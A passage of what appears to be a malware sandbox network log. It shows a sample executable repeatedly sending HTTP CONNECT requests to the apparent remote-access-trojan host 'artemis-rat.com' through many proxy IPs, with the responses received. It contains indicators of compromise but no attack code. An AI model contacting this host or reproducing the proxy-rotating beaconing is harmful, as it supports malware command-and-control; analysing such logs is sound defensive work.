                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811254978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905148029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905704975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1012192.168.2.552738146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.761535883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1013192.168.2.552693176.213.141.10780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.765456915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702142000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905159950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.886028051 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1014192.168.2.55269861.178.152.3173023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.766347885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.115189075 CET90INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1015192.168.2.552722176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.772243023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1016192.168.2.5506348.242.85.69993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.788875103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811253071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905173063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1017192.168.2.552272162.241.46.40622443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.792577028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.905029058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905709982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905189991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1018192.168.2.550569181.114.224.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.794290066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.112770081 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1019192.168.2.552737146.56.154.83210003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.802203894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1020192.168.2.55273658.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.809463024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1021192.168.2.552597203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.810661077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1022192.168.2.552310107.180.89.185490623876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.810667038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.905021906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905704021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905191898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1023192.168.2.552646102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.812525034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1024192.168.2.55229751.158.54.6031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.816634893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996531010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014666080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014702082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1025192.168.2.55060051.89.173.40238543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.828840971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996701956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1026192.168.2.552739195.248.243.14972373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.832983971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498770952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.498742104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389817953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1027192.168.2.552758172.67.181.11803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.838455915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.993762970 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1028192.168.2.552750157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.842770100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1029192.168.2.55274598.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.842770100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1030192.168.2.55274698.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.855499983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1031192.168.2.552740125.122.26.24210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.857732058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1032192.168.2.552792104.19.171.188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.857733011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.014096975 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1033192.168.2.552735103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.869061947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1034192.168.2.552247122.54.147.11080823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.869416952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996709108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014667988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
